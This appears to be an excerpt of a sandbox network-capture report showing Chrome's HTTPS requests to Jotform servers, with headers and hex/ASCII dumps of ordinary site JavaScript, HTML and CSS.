                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 74 65 73 74 28 65 29 7d 29 29 7d 29 29 2e 6a 6f 69 6e 28 22 20 22 29 3a 65 7d 7d 63 6f 6e 73 74 20 67 3d 7b 64 65 63 6f 64 65 45 6e 74 69 74 69 65 73 3a 21 30 7d 3b 6d 2e 64 65 66 61 75 6c 74 73 3d 7b 61 6c 6c 6f 77 65 64 54 61 67 73 3a 5b 22 61 64 64 72 65 73 73 22 2c 22 61 72 74 69 63 6c 65 22 2c 22 61 73 69 64 65 22 2c 22 66 6f 6f 74 65 72 22 2c 22 68 65 61 64 65 72 22 2c 22 68 31 22 2c 22 68 32 22 2c 22 68 33 22 2c 22 68 34 22 2c 22 68 35 22 2c 22 68 36 22 2c 22 68 67 72 6f 75 70 22 2c 22 6d 61 69 6e 22 2c 22 6e 61 76 22 2c 22 73 65 63 74 69 6f 6e 22 2c 22 62 6c 6f 63 6b 71 75 6f 74 65 22 2c 22 64 64 22 2c 22 64 69 76 22 2c 22 64 6c 22 2c 22 64 74 22 2c 22 66 69 67 63 61 70 74 69 6f 6e 22 2c 22 66 69 67 75 72 65 22 2c 22 68 72 22 2c 22 6c 69 22 2c 22
                                                                                                                                                                                                                                            Data Ascii: test(e)}))})).join(" "):e}}const g={decodeEntities:!0};m.defaults={allowedTags:["address","article","aside","footer","header","h1","h2","h3","h4","h5","h6","hgroup","main","nav","section","blockquote","dd","div","dl","dt","figcaption","figure","hr","li","
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 73 22 2c 22 72 6f 77 73 70 61 6e 22 2c 22 73 61 6e 64 62 6f 78 22 2c 22 73 63 6f 70 65 22 2c 22 73 68 61 70 65 22 2c 22 73 69 7a 65 22 2c 22 73 69 7a 65 73 22 2c 22 73 6c 6f 74 22 2c 22 73 70 61 6e 22 2c 22 73 70 65 6c 6c 63 68 65 63 6b 22 2c 22 73 72 63 22 2c 22 73 72 63 64 6f 63 22 2c 22 73 72 63 6c 61 6e 67 22 2c 22 73 72 63 73 65 74 22 2c 22 73 74 61 72 74 22 2c 22 73 74 65 70 22 2c 22 73 74 79 6c 65 22 2c 22 74 61 62 69 6e 64 65 78 22 2c 22 74 61 72 67 65 74 22 2c 22 74 69 74 6c 65 22 2c 22 74 72 61 6e 73 6c 61 74 65 22 2c 22 74 79 70 65 22 2c 22 75 73 65 6d 61 70 22 2c 22 76 61 6c 75 65 22 2c 22 77 69 64 74 68 22 2c 22 77 72 61 70 22 2c 22 6f 6e 61 75 78 63 6c 69 63 6b 22 2c 22 6f 6e 61 66 74 65 72 70 72 69 6e 74 22 2c 22 6f 6e 62 65 66 6f 72 65 6d
                                                                                                                                                                                                                                            Data Ascii: s","rowspan","sandbox","scope","shape","size","sizes","slot","span","spellcheck","src","srcdoc","srclang","srcset","start","step","style","tabindex","target","title","translate","type","usemap","value","width","wrap","onauxclick","onafterprint","onbeforem
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC939INData Raw: 72 64 22 2c 61 6c 6c 6f 77 65 64 41 74 74 72 69 62 75 74 65 73 3a 7b 61 3a 5b 22 68 72 65 66 22 2c 22 6e 61 6d 65 22 2c 22 74 61 72 67 65 74 22 5d 2c 69 6d 67 3a 5b 22 73 72 63 22 2c 22 73 72 63 73 65 74 22 2c 22 61 6c 74 22 2c 22 74 69 74 6c 65 22 2c 22 77 69 64 74 68 22 2c 22 68 65 69 67 68 74 22 2c 22 6c 6f 61 64 69 6e 67 22 5d 7d 2c 61 6c 6c 6f 77 65 64 45 6d 70 74 79 41 74 74 72 69 62 75 74 65 73 3a 5b 22 61 6c 74 22 5d 2c 73 65 6c 66 43 6c 6f 73 69 6e 67 3a 5b 22 69 6d 67 22 2c 22 62 72 22 2c 22 68 72 22 2c 22 61 72 65 61 22 2c 22 62 61 73 65 22 2c 22 62 61 73 65 66 6f 6e 74 22 2c 22 69 6e 70 75 74 22 2c 22 6c 69 6e 6b 22 2c 22 6d 65 74 61 22 5d 2c 61 6c 6c 6f 77 65 64 53 63 68 65 6d 65 73 3a 5b 22 68 74 74 70 22 2c 22 68 74 74 70 73 22 2c 22 66 74
                                                                                                                                                                                                                                            Data Ascii: rd",allowedAttributes:{a:["href","name","target"],img:["src","srcset","alt","title","width","height","loading"]},allowedEmptyAttributes:["alt"],selfClosing:["img","br","hr","area","base","basefont","input","link","meta"],allowedSchemes:["http","https","ft


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            81192.168.2.1749796104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC540OUTGET /server/check-olark-chat-support?from=app-builder HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1358INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:19 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:36:19 GMT
                                                                                                                                                                                                                                            jf-trace-id: 6145b19d75ecc39f
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:19 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:19 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC78INData Raw: 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 66 63 62 36 34 33 38 65 37 31 34 33 39 38 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8ffcb6438e714398-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 37 66 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 20 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d
                                                                                                                                                                                                                                            Data Ascii: 7ff9<!DOCTYPE html>...[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->...[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->...[if IE 8]> <html class="no-js lt-ie9"> <![endif]-->...[if gt IE 8]><!-
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 6a 6f 74 66 6f 72 6d 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 72 65 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 40 6a 6f 74 66 6f 72 6d 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 61 73 73 65 74 73 2f 69 6d 67 2f 6c 61 6e 64 69 6e 67 2f 6f 70 65 6e 67 72 61 70 68 2e 70 6e 67 3f 76 3d 31 2e 30 2e 30 2e 30 2e 61 22 20 2f 3e 0a 3c
                                                                                                                                                                                                                                            Data Ascii: name="twitter:card" content="summary_large_image"><meta name="twitter:site" content="@jotform"><meta name="twitter:creator" content="@jotform"><meta name="twitter:image" content="https://cdn.jotfor.ms/assets/img/landing/opengraph.png?v=1.0.0.0.a" /><
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 69 67 69 6e 3d 22 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 61 70 69 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 61 63 63 6f 75 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22
                                                                                                                                                                                                                                            Data Ascii: igin="" /><link rel="preconnect" href="//www.google.com" crossorigin="" /><link rel="preconnect" href="//apis.google.com" crossorigin="" /><link rel="preconnect" href="//ssl.gstatic.com" crossorigin="" /><link rel="preconnect" href="//accounts.google.com"
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 6f 64 79 2c 20 62 6f 64 79 20 2a 22 29 3b 20 76 61 72 20 72 65 73 75 6c 74 73 20 3d 20 5b 5d 3b 20 76 61 72 20 63 68 69 6c 64 3b 20 66 6f 72 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 65 6c 65 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 20 63 68 69 6c 64 20 3d 20 65 6c 65 6d 65 6e 74 73 5b 69 5d 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 3b 20 69 66 28 65 6c 65 6d 65 6e 74 73 5b 69 5d 2e 68 61 73 43 68 69 6c 64 4e 6f 64 65 73 28 29 20 26 26 20 63 68 69 6c 64 2e 6e 6f 64 65 54 79 70 65 20 3d 3d 20 33 29 20 7b 20 72 65 73 75 6c 74 73 2e 70 75 73 68 28 63 68 69 6c 64 29 3b 20 7d 20 7d 20 72 65 74 75 72 6e 20 72 65 73 75 6c 74 73 3b 20 7d 20 76 61 72 20 74 65 78 74 6e 6f 64 65 73 20 3d 20 6e 61 74 69 76 65 53 65 6c 65 63 74 6f 72 28 29 2c
                                                                                                                                                                                                                                            Data Ascii: ody, body *"); var results = []; var child; for(var i = 0; i < elements.length; i++) { child = elements[i].childNodes[0]; if(elements[i].hasChildNodes() && child.nodeType == 3) { results.push(child); } } return results; } var textnodes = nativeSelector(),
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 6f 6e 3a 74 68 69 73 2e 64 61 74 61 73 65 74 2e 6a 66 61 7c 7c 74 68 69 73 2e 69 6e 6e 65 72 48 54 4d 4c 7d 29 3a 72 2e 74 69 63 6b 28 7b 61 63 74 6f 72 3a 77 69 6e 64 6f 77 2e 75 73 65 72 6e 61 6d 65 2c 61 63 74 69 6f 6e 3a 22 63 6c 69 63 6b 22 2c 74 61 72 67 65 74 3a 74 68 69 73 2e 64 61 74 61 73 65 74 2e 6a 66 61 7c 7c 74 68 69 73 2e 69 6e 6e 65 72 48 54 4d 4c 7d 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 69 73 49 6e 56 69 65 77 70 6f 72 74 28 74 29 7b 76 61 72 20 6e 2c 74 3d 74 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 72 65 74 75 72 6e 21 21 28 74 2e 74 6f 70 7c 7c 74 2e 72 69 67 68 74 7c 7c 74 2e 62 6f 74 74 6f 6d 7c 7c 74 2e 6c 65 66 74 7c 7c 74 2e 77 69 64 74 68 7c 7c 74 2e 68 65 69 67 68 74 7c 7c 74 2e 78 7c 7c
                                                                                                                                                                                                                                            Data Ascii: on:this.dataset.jfa||this.innerHTML}):r.tick({actor:window.username,action:"click",target:this.dataset.jfa||this.innerHTML})})})}function isInViewport(t){var n,t=t.getBoundingClientRect();return!!(t.top||t.right||t.bottom||t.left||t.width||t.height||t.x||
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 22 29 3b 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 65 6e 74 65 72 70 72 69 73 65 2d 63 6f 6d 6d 6f 6e 2d 73 65 63 74 69 6f 6e 22 29 26 26 28 74 3d 28 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 65 6e 74 65 72 70 72 69 73 65 2d 63 6f 6d 6d 6f 6e 2d 73 65 63 74 69 6f 6e 22 29 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 61 22 29 2c 6f 3d 21 31 2c 69 3d 74 68 72 6f 74 74 6c 65 28 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 6e 26 26 69 73 49 6e 56 69 65 77 70 6f 72 74 28 6e 29 26 26 21 6f 26 26 28 6f 3d 21 30 2c 28 74 3d 6e 75 6c 6c 3d 3d 28 74 3d 77 69 6e 64 6f 77 29 3f 76 6f 69 64 20 30 3a 74 2e 75 73 65 72 6e 61 6d 65 29 26 26 72 2e 74 69 63 6b 28 7b 61 63 74 6f 72 3a
                                                                                                                                                                                                                                            Data Ascii: ");document.querySelector("#enterprise-common-section")&&(t=(n=document.querySelector("#enterprise-common-section")).querySelector("a"),o=!1,i=throttle(e=function(){var t;n&&isInViewport(n)&&!o&&(o=!0,(t=null==(t=window)?void 0:t.username)&&r.tick({actor:
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 62 75 74 74 6f 6e 2c 68 72 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 70 72 6f 67 72 65 73 73 2c 73 75 62 2c 73 75 70 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 61 2c 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 70 7b 6d 61 72 67 69 6e 3a 30 7d 64 65 74 61 69
                                                                                                                                                                                                                                            Data Ascii: | MIT License | github.com/necolas/normalize.css */button,hr,input{overflow:visible}progress,sub,sup{vertical-align:baseline}a,button{background-color:transparent}html{line-height:1.15;-webkit-text-size-adjust:100%}body,h1,h2,h3,h4,h5,h6,p{margin:0}detai
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 3a 2d 77 65 62 6b 69 74 2d 69 6e 6e 65 72 2d 73 70 69 6e 2d 62 75 74 74 6f 6e 2c 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 3a 2d 77 65 62 6b 69 74 2d 6f 75 74 65 72 2d 73 70 69 6e 2d 62 75 74 74 6f 6e 7b 68 65 69 67 68 74 3a 61 75 74 6f 7d 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 74 65 78 74 66 69 65 6c 64 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2d 32 70 78 7d 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 7b 2d 77 65 62 6b
                                                                                                                                                                                                                                            Data Ascii: type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webk
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 20 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 39 34 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 33 33 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 70 61 64 64 69 6e 67 3a 30 20 31 25 7d 5b 63 6c 61 73 73 2a 3d 22 63 6f 6c 75 6d 6e 20 74 77 65 6c 76 65 20 74 77 65 6c 76 65 22 5d 2c 5b 63 6c 61 73 73 2a 3d 22 63 6f 6c 75 6d 6e 20 65 69 67 68 74 20 65 69 67 68 74 22 5d 2c 5b 63 6c 61 73 73 2a 3d 22 63 6f 6c 75 6d 6e 20 73 65 76 65 6e 20 73 65 76 65 6e 22 5d 2c 5b 63 6c 61 73 73 2a 3d 22 63 6f 6c 75 6d 6e 20 65 6c 65 76 65 6e 20 65 6c 65 76 65 6e 22 5d 2c 5b 63 6c 61 73 73 2a 3d 22 63 6f 6c 75 6d 6e 20 66 69 76 65 20 66 69 76
                                                                                                                                                                                                                                            Data Ascii: strong{font-weight:700}.container{width:94%;max-width:1330px;margin:0 auto;position:relative;padding:0 1%}[class*="column twelve twelve"],[class*="column eight eight"],[class*="column seven seven"],[class*="column eleven eleven"],[class*="column five fiv


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            82192.168.2.1749793104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC841OUTGET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?time=1736507717 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1238INHTTP/1.1 302 Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:19 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:05:16 GMT
                                                                                                                                                                                                                                            jf-trace-id: b67910836ae4169d
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:36:19 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            location: https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=ryw-nPNnemSleOEGRmSPqA&expires=1736510726
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 1863
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb643aea24398-EWR


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            83192.168.2.1749797104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC386OUTGET /s/portal/674ac14411e/static/js/4646.d3fc3085.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC429INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:19 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 188877
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:17 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "dc7d4d348fe1f99af4ac06d2a42b5088"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 281
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6464d1242b7-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC940INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 34 36 34 36 2e 64 33 66 63 33 30 38 35 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64
                                                                                                                                                                                                                                            Data Ascii: /*! For license information please see 4646.d3fc3085.js.LICENSE.txt */!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugId
